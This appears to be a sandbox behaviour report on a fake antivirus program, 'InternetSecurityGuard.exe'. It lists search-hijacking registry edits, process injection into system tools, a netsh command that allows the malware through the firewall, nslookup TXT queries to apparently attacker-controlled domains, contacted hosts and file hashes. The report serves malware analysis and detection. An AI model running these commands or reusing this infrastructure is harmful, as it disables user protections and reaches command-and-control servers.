Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 64 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 64 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 64 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 64 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 64 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 64 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 64 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp "C:\Users\Admin\AppData\Local\Temp\Fake AV\5781.mof"

C:\Windows\SysWOW64\netsh.exe

netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe" "Internet Security Guard" ENABLE

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.220.220

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 www5.internet-security-guard.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 122.131.105.46.in-addr.arpa udp
US 74.82.198.254:80 tcp
SG 76.73.19.181:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 222.222.67.208.in-addr.arpa udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 220.220.67.208.in-addr.arpa udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 74.82.198.253:80 tcp
US 74.82.198.253:80 tcp
SG 76.73.19.181:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 74.82.198.254:80 tcp
US 74.82.198.253:80 tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
N/A 127.0.0.1:27777 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 74.82.198.253:80 tcp

Files

memory/64-0-0x00000000023F0000-0x00000000023F1000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 b8224e5293d4fad1927c751cc00c80e7
SHA1 270b8c752c7e93ec5485361fe6ef7b37f0b4513b
SHA256 c47da9be4fc4d757add73c49654c9179067af547d0cc758d6356e2955bbfcb61
SHA512 8fed9a509e46319529145fa2159251e43040d26080af84e44badaab1dd339c767ff75a2c473bc0abfb448b03beb96718ee34ba6bc150ed3085322878b55a22f2

C:\Windows\System32\drivers\etc\hosts

MD5 008fba141529811128b8cd5f52300f6e
SHA1 1a350b35d82cb4bd7a924b6840c36a678105f793
SHA256 ab0e454a786ef19a3ae1337f10f47354ffa9521ea5026e9e11174eca22d86e84
SHA512 80189560b6cf180a9c1ecafc90018b48541687f52f5d49b54ca25e040b3264da053e3d4dbb0cd38caaf496e23e516de18f500b333e3cda1fd1b25c6e9632defc

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 6e86650ad96258b23f022605c5f202d5
SHA1 321290e91871cb653441e3c87ee8b20ab5f008a0
SHA256 8c39246796530ee7588fc16486335d00d5b7273ebb26efe5833e4cfc2bcfe223
SHA512 e8a7bdf4bd2fba233a1a6cdf977d57dcb37ae46bc52bf29b4d23c6294e769069e146bcb5f56c4edbc3f93d38a226a9349f604b54156696ccdef41106cc05060c

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c0d1c60ba61e5779908fca77da375398
SHA1 7b4029b08abeef0c7debd2f9ea44c3ac0d55a926
SHA256 275727d35e9f113539cf02fb81ef35408242c29c14755f592d54590d23bbfedd
SHA512 7306029e6ef8082e6f23ed8e9ae8893249290b8f579942dd4e857bc98b6d54f895a4a63992689d8a7f4a2b93c90b178d3b53d323da25cff5fecbcbe8503bc488

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0etkwu5l.default-release\prefs.js

MD5 bf8ebb7e5ad797e5ab158a0d8a5ab5da
SHA1 9ad01fa0a0074b775d77171b18ee22c264b8fa54
SHA256 498d565388665d46c31f7eaf04cda36242733a7848e967a027c83a7412b61c5c
